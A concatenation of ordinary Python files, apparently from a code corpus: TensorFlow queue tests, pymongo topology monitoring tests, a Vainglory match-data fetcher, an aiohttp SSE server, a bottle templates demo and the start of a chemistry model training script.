self.assertEqual(size_t.eval(), 3)
def blocking_enqueue():
# This will block until the dequeue after the close.
sess.run(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# First blocking_enqueue_op of blocking_enqueue has enqueued 1 of 2
# elements, and is blocked waiting for one more element to be dequeued.
for i in range(50):
queue_size = size_t.eval()
if queue_size == 4:
break
elif i == 49:
self.fail(
"Blocking enqueue op did not execute within the expected time.")
time.sleep(0.1)
def blocking_close():
sess.run(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Unblock the first blocking_enqueue_op in blocking_enqueue.
q.dequeue().eval()
thread2.join()
thread1.join()
# At this point the close operation will complete, so the next enqueue
# will fail.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
sess.run(blocking_enqueue_op)
def testSharedQueueSameSession(self):
with self.test_session():
q1 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
# TensorFlow TestCase adds a default graph seed (=87654321). We check if
# the seed computed from the default graph seed is reproduced.
seed = 887634792
q2 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=seed)
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q2.dequeue().eval(), 10.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q1.dequeue().eval(), 20.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
def testSharedQueueSameSessionGraphSeedNone(self):
with self.test_session():
q1 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=98765432)
q1.enqueue((10.0,)).run()
# If both graph and op seeds are not provided, the default value must be
# used, and in case a shared queue is already created, the second queue op
# must accept any previous seed value.
random_seed.set_random_seed(None)
q2 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
def testIncompatibleSharedQueueErrors(self):
with self.test_session():
q_a_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_a")
q_a_2 = data_flow_ops.RandomShuffleQueue(
15, 5, dtypes_lib.float32, shared_name="q_a")
q_a_1.queue_ref.op.run()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.op.run()
q_b_1 = data_flow_ops.RandomShuffleQueue(
10, 0, dtypes_lib.float32, shared_name="q_b")
q_b_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_b")
q_b_1.queue_ref.op.run()
with self.assertRaisesOpError("min_after_dequeue"):
q_b_2.queue_ref.op.run()
q_c_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_c")
q_c_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shared_name="q_c")
q_c_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_c_2.queue_ref.op.run()
q_d_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_d")
q_d_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.op.run()
q_e_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_e")
q_e_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.op.run()
q_f_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_f")
q_f_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_f")
q_f_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_f_2.queue_ref.op.run()
q_g_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_g")
q_g_2 = data_flow_ops.RandomShuffleQueue(
10, 5, (dtypes_lib.float32, dtypes_lib.int32), shared_name="q_g")
q_g_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_g_2.queue_ref.op.run()
q_h_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=12, shared_name="q_h")
q_h_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=21, shared_name="q_h")
q_h_1.queue_ref.op.run()
with self.assertRaisesOpError("random seeds"):
q_h_2.queue_ref.op.run()
def testSelectQueue(self):
with self.test_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(
data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = data_flow_ops.RandomShuffleQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.test_session():
q1 = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
q2 = data_flow_ops.RandomShuffleQueue(15, 0, dtypes_lib.float32)
enq_q = data_flow_ops.RandomShuffleQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("is not in"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_many_op)
def _blockingDequeueUpTo(self, sess, dequeue_up_to_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_up_to_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(enqueue_many_op)
def testResetOfBlockingOperation(self):
with self.test_session() as sess:
q_empty = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, (
(),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
dequeue_up_to_op = q_empty.dequeue_up_to(1)
q_full = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(
self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(
self._blockingDequeueMany, args=(sess, dequeue_many_op)),
self.checkedThread(
self._blockingDequeueUpTo, args=(sess, dequeue_up_to_op)),
self.checkedThread(
self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(
self._blockingEnqueueMany, args=(sess, enqueue_many_op))
]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testDequeueManyInDifferentOrders(self):
with self.test_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_many(5)
deq2 = q2.dequeue_many(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueUpToInDifferentOrders(self):
with self.test_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_up_to(5)
deq2 = q2.dequeue_up_to(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueInDifferentOrders(self):
with self.test_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue()
deq2 = q2.dequeue()
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
for _ in range(5):
results[0].append(deq1.eval())
results[1].append(deq2.eval())
q1.close().run()
q2.close().run()
for _ in range(5):
results[2].append(deq1.eval())
results[3].append(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testBigEnqueueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
sess.run(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertItemsEqual(elem, results)
def testBigDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(2, 0, dtypes_lib.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(sess.run(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
sess.run(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertItemsEqual(elem, results)
if __name__ == "__main__":
test.main()
|
request_data.py
|
import os
import time
from threading import Thread
from requests import HTTPError
from api import VaingloryApi
from flask_app import db
from models import Team
from process_data import process_batch_query
api_key = os.environ.get('API_KEY', None)
api = VaingloryApi(api_key)
class PlayerNotFound(Exception):
pass
def get_time():
    return time.strftime("%Y-%m-%dT%H:%M:%SZ")
def query_player(name, region):
try:
response = api.matches(region=region, limit=50, createdAtStart="2017-03-01T00:00:00Z",
createdAtEnd=get_time(), sort="-createdAt", player=name)
except HTTPError as e:
        raise PlayerNotFound(str(e))
player = [i for i in response["included"] if i["type"] == "player" and i["attributes"]["name"] == name]
if len(player) == 1:
return player[0]
else:
raise PlayerNotFound("Player {0} not found for region {1}".format(name, region))
def query_team(team_id):
# shiqan = "2537169e-2619-11e5-91a4-06eb725f8a76"
# shanlom = "78a83898-7193-11e4-9389-062d0b175276"
# kanonmara = "d49ff1fe-8ede-11e5-8bec-06f4ee369f53"
# maestro = "786c586c-8fb7-11e5-a1ef-068789513eb5"
team = db.session.query(Team).get(team_id)
for player in team._members:
response = api.matches(region="eu", createdAtStart="2017-03-01T00:00:00Z",
createdAtEnd=get_time(), sort="-createdAt", gameMode="ranked",
playerId="{0}".format(player.id))
print(len(response['data']))
process_batch_query(response)
def process_id(player_id, gamemode="ranked"):
return api.matches(region="eu", createdAtStart="2017-03-01T00:00:00Z",
createdAtEnd=get_time(), sort="-createdAt", gameMode=gamemode, playerId="{0}".format(player_id))
def process_range(id_range, store=None, gamemode="ranked"):
if store is None:
store = {}
for id in id_range:
result = process_id(id, gamemode)
process_batch_query(result)
store[id] = True
return store
def threaded_process_range(nthreads, id_range, gamemode):
"""process the id range in a specified number of threads"""
store = {}
threads = []
# create the threads
for i in range(nthreads):
ids = id_range[i::nthreads]
t = Thread(target=process_range, args=(ids, store, gamemode))
threads.append(t)
# start the threads
[t.start() for t in threads]
# wait for the threads to finish
[t.join() for t in threads]
return store
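# Example (a minimal usage sketch, not part of the original script; the player ids are the
# ones listed in the comments of query_team above):
#
#     player_ids = ["d49ff1fe-8ede-11e5-8bec-06f4ee369f53",  # kanonmara
#                   "786c586c-8fb7-11e5-a1ef-068789513eb5"]  # maestro
#     store = threaded_process_range(2, player_ids, "ranked")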
if __name__ == "__main__":
# query_player("Shiqan", "eu")
query_team("cca544dd-8fb9-4640-97fa-d20aee017639")
|
test_discovery_and_monitoring.py
|
# Copyright 2014-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the topology module."""
import os
import sys
import threading
import time
sys.path[0:0] = [""]
from bson import json_util, Timestamp
from pymongo import (common,
monitoring)
from pymongo.errors import (AutoReconnect,
ConfigurationError,
NetworkTimeout,
NotMasterError,
OperationFailure)
from pymongo.helpers import _check_command_response
from pymongo.ismaster import IsMaster
from pymongo.server_description import ServerDescription, SERVER_TYPE
from pymongo.settings import TopologySettings
from pymongo.topology import Topology, _ErrorContext
from pymongo.topology_description import TOPOLOGY_TYPE
from pymongo.uri_parser import parse_uri
from test import unittest, IntegrationTest
from test.utils import (assertion_context,
cdecimal_patched,
CMAPListener,
client_context,
Barrier,
get_pool,
HeartbeatEventListener,
server_name_to_type,
rs_or_single_client,
single_client,
TestCreator,
wait_until)
from test.utils_spec_runner import SpecRunner, SpecRunnerThread
from test.pymongo_mocks import DummyMonitor
# Location of JSON test specifications.
_TEST_PATH = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'discovery_and_monitoring')
def create_mock_topology(uri, monitor_class=DummyMonitor):
parsed_uri = parse_uri(uri)
replica_set_name = None
direct_connection = None
if 'replicaset' in parsed_uri['options']:
replica_set_name = parsed_uri['options']['replicaset']
if 'directConnection' in parsed_uri['options']:
direct_connection = parsed_uri['options']['directConnection']
topology_settings = TopologySettings(
parsed_uri['nodelist'],
replica_set_name=replica_set_name,
monitor_class=monitor_class,
direct_connection=direct_connection)
c = Topology(topology_settings)
c.open()
return c
def got_ismaster(topology, server_address, ismaster_response):
server_description = ServerDescription(
server_address, IsMaster(ismaster_response), 0)
topology.on_change(server_description)
def got_app_error(topology, app_error):
server_address = common.partition_node(app_error['address'])
server = topology.get_server_by_address(server_address)
error_type = app_error['type']
generation = app_error.get('generation', server.pool.generation)
when = app_error['when']
max_wire_version = app_error['maxWireVersion']
# XXX: We could get better test coverage by mocking the errors on the
# Pool/SocketInfo.
try:
if error_type == 'command':
_check_command_response(app_error['response'], max_wire_version)
elif error_type == 'network':
raise AutoReconnect('mock non-timeout network error')
elif error_type == 'timeout':
raise NetworkTimeout('mock network timeout error')
else:
raise AssertionError('unknown error type: %s' % (error_type,))
assert False
except (AutoReconnect, NotMasterError, OperationFailure) as e:
if when == 'beforeHandshakeCompletes':
completed_handshake = False
elif when == 'afterHandshakeCompletes':
completed_handshake = True
else:
assert False, 'Unknown when field %s' % (when,)
topology.handle_error(
server_address, _ErrorContext(e, max_wire_version, generation,
completed_handshake))
def get_type(topology, hostname):
description = topology.get_server_by_address((hostname, 27017)).description
return description.server_type
class TestAllScenarios(unittest.TestCase):
pass
def topology_type_name(topology_type):
return TOPOLOGY_TYPE._fields[topology_type]
def server_type_name(server_type):
return SERVER_TYPE._fields[server_type]
def check_outcome(self, topology, outcome):
expected_servers = outcome['servers']
# Check weak equality before proceeding.
self.assertEqual(
len(topology.description.server_descriptions()),
len(expected_servers))
if outcome.get('compatible') is False:
with self.assertRaises(ConfigurationError):
topology.description.check_compatible()
else:
# No error.
topology.description.check_compatible()
# Since lengths are equal, every actual server must have a corresponding
# expected server.
for expected_server_address, expected_server in expected_servers.items():
node = common.partition_node(expected_server_address)
self.assertTrue(topology.has_server(node))
actual_server = topology.get_server_by_address(node)
actual_server_description = actual_server.description
expected_server_type = server_name_to_type(expected_server['type'])
self.assertEqual(
server_type_name(expected_server_type),
server_type_name(actual_server_description.server_type))
self.assertEqual(
expected_server.get('setName'),
actual_server_description.replica_set_name)
self.assertEqual(
expected_server.get('setVersion'),
actual_server_description.set_version)
self.assertEqual(
expected_server.get('electionId'),
actual_server_description.election_id)
self.assertEqual(
expected_server.get('topologyVersion'),
actual_server_description.topology_version)
expected_pool = expected_server.get('pool')
if expected_pool:
self.assertEqual(
expected_pool.get('generation'),
actual_server.pool.generation)
self.assertEqual(outcome['setName'], topology.description.replica_set_name)
self.assertEqual(outcome.get('logicalSessionTimeoutMinutes'),
topology.description.logical_session_timeout_minutes)
expected_topology_type = getattr(TOPOLOGY_TYPE, outcome['topologyType'])
self.assertEqual(topology_type_name(expected_topology_type),
topology_type_name(topology.description.topology_type))
def create_test(scenario_def):
def run_scenario(self):
c = create_mock_topology(scenario_def['uri'])
for i, phase in enumerate(scenario_def['phases']):
# Including the phase description makes failures easier to debug.
description = phase.get('description', str(i))
with assertion_context('phase: %s' % (description,)):
for response in phase.get('responses', []):
got_ismaster(
c, common.partition_node(response[0]), response[1])
for app_error in phase.get('applicationErrors', []):
got_app_error(c, app_error)
check_outcome(self, c, phase['outcome'])
return run_scenario
def create_tests():
for dirpath, _, filenames in os.walk(_TEST_PATH):
dirname = os.path.split(dirpath)[-1]
for filename in filenames:
with open(os.path.join(dirpath, filename)) as scenario_stream:
scenario_def = json_util.loads(scenario_stream.read())
# Construct test from scenario.
new_test = create_test(scenario_def)
test_name = 'test_%s_%s' % (
dirname, os.path.splitext(filename)[0])
new_test.__name__ = test_name
setattr(TestAllScenarios, new_test.__name__, new_test)
create_tests()
class TestClusterTimeComparison(unittest.TestCase):
def test_cluster_time_comparison(self):
t = create_mock_topology('mongodb://host')
def send_cluster_time(time, inc, should_update):
old = t.max_cluster_time()
new = {'clusterTime': Timestamp(time, inc)}
got_ismaster(t,
('host', 27017),
{'ok': 1,
'minWireVersion': 0,
'maxWireVersion': 6,
'$clusterTime': new})
actual = t.max_cluster_time()
if should_update:
self.assertEqual(actual, new)
else:
self.assertEqual(actual, old)
send_cluster_time(0, 1, True)
send_cluster_time(2, 2, True)
send_cluster_time(2, 1, False)
send_cluster_time(1, 3, False)
send_cluster_time(2, 3, True)
class TestIgnoreStaleErrors(IntegrationTest):
def test_ignore_stale_connection_errors(self):
N_THREADS = 5
barrier = Barrier(N_THREADS, timeout=30)
client = rs_or_single_client(minPoolSize=N_THREADS)
self.addCleanup(client.close)
# Wait for initial discovery.
client.admin.command('ping')
pool = get_pool(client)
starting_generation = pool.generation
wait_until(lambda: len(pool.sockets) == N_THREADS, 'created sockets')
def mock_command(*args, **kwargs):
# Synchronize all threads to ensure they use the same generation.
barrier.wait()
raise AutoReconnect('mock SocketInfo.command error')
for sock in pool.sockets:
sock.command = mock_command
def insert_command(i):
try:
client.test.command('insert', 'test', documents=[{'i': i}])
except AutoReconnect as exc:
pass
threads = []
for i in range(N_THREADS):
threads.append(threading.Thread(target=insert_command, args=(i,)))
for t in threads:
t.start()
for t in threads:
t.join()
# Expect a single pool reset for the network error
self.assertEqual(starting_generation+1, pool.generation)
# Server should be selectable.
client.admin.command('ping')
class CMAPHeartbeatListener(HeartbeatEventListener, CMAPListener):
pass
class TestPoolManagement(IntegrationTest):
@client_context.require_failCommand_appName
def test_pool_unpause(self):
# This test implements the prose test "Connection Pool Management"
listener = CMAPHeartbeatListener()
client = single_client(appName="SDAMPoolManagementTest",
heartbeatFrequencyMS=500,
event_listeners=[listener])
self.addCleanup(client.close)
# Assert that ConnectionPoolReadyEvent occurs after the first
# ServerHeartbeatSucceededEvent.
listener.wait_for_event(monitoring.PoolReadyEvent, 1)
pool_ready = listener.events_by_type(monitoring.PoolReadyEvent)[0]
hb_succeeded = listener.events_by_type(
monitoring.ServerHeartbeatSucceededEvent)[0]
self.assertGreater(
listener.events.index(pool_ready),
listener.events.index(hb_succeeded))
listener.reset()
fail_ismaster = {
'mode': {'times': 2},
'data': {
'failCommands': ['isMaster'],
'errorCode': 1234,
'appName': 'SDAMPoolManagementTest',
},
}
with self.fail_point(fail_ismaster):
listener.wait_for_event(monitoring.ServerHeartbeatFailedEvent, 1)
listener.wait_for_event(monitoring.PoolClearedEvent, 1)
listener.wait_for_event(
monitoring.ServerHeartbeatSucceededEvent, 1)
listener.wait_for_event(monitoring.PoolReadyEvent, 1)
class TestIntegration(SpecRunner):
# Location of JSON test specifications.
TEST_PATH = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'discovery_and_monitoring_integration')
def _event_count(self, event):
if event == 'ServerMarkedUnknownEvent':
def marked_unknown(e):
return (isinstance(e, monitoring.ServerDescriptionChangedEvent)
and not e.new_description.is_server_type_known)
return len(self.server_listener.matching(marked_unknown))
# Only support CMAP events for now.
self.assertTrue(event.startswith('Pool') or event.startswith('Conn'))
event_type = getattr(monitoring, event)
return self.pool_listener.event_count(event_type)
def maybe_skip_scenario(self, test):
"""Override to skip threaded tests when cdecimal is installed on 2.7
"""
super(TestIntegration, self).maybe_skip_scenario(test)
# PYTHON-2332
ops = [op['name'] for op in test['operations']]
if cdecimal_patched() and 'startThread' in ops:
raise unittest.SkipTest('PYTHON-2332 test fails with cdecimal')
def assert_event_count(self, event, count):
"""Run the assertEventCount test operation.
Assert the given event was published exactly `count` times.
"""
self.assertEqual(self._event_count(event), count,
'expected %s not %r' % (count, event))
def wait_for_event(self, event, count):
"""Run the waitForEvent test operation.
Wait for a number of events to be published, or fail.
"""
wait_until(lambda: self._event_count(event) >= count,
'find %s %s event(s)' % (count, event))
def configure_fail_point(self, fail_point):
"""Run the configureFailPoint test operation.
"""
self.set_fail_point(fail_point)
self.addCleanup(self.set_fail_point, {
'configureFailPoint': fail_point['configureFailPoint'],
'mode': 'off'})
def run_admin_command(self, command, **kwargs):
"""Run the runAdminCommand test operation.
"""
self.client.admin.command(command, **kwargs)
def record_primary(self):
"""Run the recordPrimary test operation.
"""
self._previous_primary = self.scenario_client.primary
def wait_for_primary_change(self, timeout_ms):
"""Run the waitForPrimaryChange test operation.
"""
def primary_changed():
primary = self.scenario_client.primary
if primary is None:
return False
return primary != self._previous_primary
timeout = timeout_ms/1000.0
wait_until(primary_changed, 'change primary', timeout=timeout)
def wait(self, ms):
"""Run the "wait" test operation.
"""
time.sleep(ms/1000.0)
def start_thread(self, name):
"""Run the 'startThread' thread operation."""
thread = SpecRunnerThread(name)
thread.start()
self.targets[name] = thread
def run_on_thread(self, sessions, collection, name, operation):
"""Run the 'runOnThread' operation."""
thread = self.targets[name]
thread.schedule(lambda: self._run_op(
sessions, collection, operation, False))
def wait_for_thread(self, name):
"""Run the 'waitForThread' operation."""
thread = self.targets[name]
thread.stop()
thread.join(60)
if thread.exc:
raise thread.exc
self.assertFalse(
thread.is_alive(), 'Thread %s is still running' % (name,))
def create_spec_test(scenario_def, test, name):
@client_context.require_test_commands
def run_scenario(self):
self.run_scenario(scenario_def, test)
return run_scenario
test_creator = TestCreator(create_spec_test, TestIntegration, TestIntegration.TEST_PATH)
test_creator.create_tests()
if __name__ == "__main__":
unittest.main()
|
server.py
|
import asyncio
import json
import os
from multiprocessing import Process
from aiohttp import web
from aiohttp_sse import sse_response
from pncl import STATIC_DIR
class Server:
def __init__(self, port=8080, host='0.0.0.0', events_per_second=1):
"""
Creates the backend server.
:param port: port on which aiohttp listens for requests.
:param host: host on which to deploy the aiohttp app.
:param events_per_second: how many times per second to check for new SSE
event requests.
"""
# Config
self.port = port
self.host = host
self.events_per_second = events_per_second
# Multiprocessing
self._p = None
self._event_queue = None
self._config_queue = None
self._config = None
# App
self._app = web.Application()
self._app.add_routes([
web.get('/config', self._get_config), # Endpoint for getting config
web.get('/event', self._event), # Endpoint for EventSource
web.get('/', self._index), # Called by View to get index
web.static('/', STATIC_DIR), # Serves static files (.js, .png, .css, etc)
])
def _main(self, event_queue, config_queue):
"""
Main runner for the backend.
"""
self._event_queue = event_queue
self._config_queue = config_queue
web.run_app(self._app, host=self.host, port=self.port)
async def _index(self, request):
"""
Callback for GET on /
"""
return web.FileResponse(os.path.join(STATIC_DIR, 'index.html'))
async def _get_config(self, request):
"""
        Callback for GET on /config
"""
return web.Response(text=self._config)
async def _event(self, request):
"""
Callback for SSE GET on /event
"""
loop = request.app.loop
async with sse_response(request) as resp:
            while True:
                # Drain any events queued by the producer process.
                while True:
                    try:
                        event = self._event_queue.get(block=False)
                        await resp.send(event)
                    except Exception:
                        # Queue is empty (or not yet attached); stop draining.
                        break
                # Pick up a new config if one has been pushed.
                try:
                    new_config = self._config_queue.get(block=False)
                    if new_config:
                        self._config = new_config
                except Exception:
                    pass
data = json.dumps('NOP')
await resp.send(data)
await asyncio.sleep(1 / self.events_per_second, loop=loop)
def start(self, event_queue, config_queue):
"""
Starts the backend server.
:param event_queue: multiprocessing.Manager.Queue object
:param config_queue: multiprocessing.Manager.Queue object
"""
self._p = Process(target=self._main, args=(event_queue, config_queue))
self._p.start()
def stop(self):
"""
Kills the backend server.
"""
print("Shutting down Pencil backend")
self._p.terminate()
def get_endpoint(self, name=None):
"""
Returns full http path for the given endpoint.
:param name: string (if None, returns path for /)
"""
return 'http://{}:{}/{}'.format(self.host, self.port, name if name else '')
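# Example (a minimal usage sketch, not part of the original module; per the start() docstring
# the queues come from a multiprocessing.Manager, and the event payload below is illustrative):
#
#     from multiprocessing import Manager
#     manager = Manager()
#     event_queue, config_queue = manager.Queue(), manager.Queue()
#     server = Server(port=8080)
#     server.start(event_queue, config_queue)
#     event_queue.put('{"type": "example"}')  # delivered to SSE clients connected to /event
#     server.stop()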
|
demo.py
|
"""Templates Demo
"""
import argparse
import threading
import time
import webbrowser
try:
from bottle import get, run
except ImportError:
print('''\
Error: Templates demo requires the "bottle" web framework.
Install the "bottle" package using:
$ python3 -m pip install bottle
Then try executing the demo again.''')
exit(1)
from templates import HTMLTemplate
from templates.bootstrap import Starter, Jumbotron
class Index(HTMLTemplate):
def body(self):
with self.tag('h1'):
self.add('Python Templates')
with self.tag('ul'):
with self.tag('li'):
with self.tag('a', attrs={'href': '/starter/'}):
self.add('Bootstrap Starter')
with self.tag('li'):
with self.tag('a', attrs={'href': '/jumbotron/'}):
self.add('Bootstrap Jumbotron')
@get('/')
def index():
doc = Index()
return doc.format()
@get('/starter/')
def starter():
doc = Starter()
return doc.format()
@get('/jumbotron/')
def jumbotron():
doc = Jumbotron()
return doc.format()
def launch(host, port):
time.sleep(1)
webbrowser.open(f'http://{host}:{port}/')
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--no-launch', dest='launch', action='store_false')
parser.add_argument('--host', default='localhost')
parser.add_argument('--port', default=5050, type=int)
parser.add_argument('--reload', action='store_true')
parser.add_argument('--debug', action='store_true')
args = parser.parse_args()
if args.launch:
thread = threading.Thread(target=launch, args=(args.host, args.port))
thread.start()
run(host=args.host, port=args.port, reloader=args.reload, debug=args.debug)
if __name__ == '__main__':
main()
|
nntrain.py
|
import tensorflow as tf
from utils.nn import linearND, linear
from mol_graph import atom_fdim as adim, bond_fdim as bdim, max_nb, smiles2graph
from models import *
import math, sys, random
from optparse import OptionParser
import threading
parser = OptionParser()
parser.add_option("-t", "--train", dest="train_path")
parser.add_option("-p", "--cand", dest="cand_path", default=None)
parser.add_option("-b", "--batch", dest="batch_size", default=4)
parser.add_option("-c", "--ncore", dest="core_size", default=10)
parser.add_option("-a", "--ncand", dest="cand_size", default=500)
parser.add_option("-m", "--save_dir", dest="save_path")
parser.add_option("-w", "--hidden", dest="hidden_size", default=100)
parser.add_option("-d", "--depth", dest="depth", default=1)
parser.add_option("-n", "--max_norm", dest="max_norm", default=50.0)
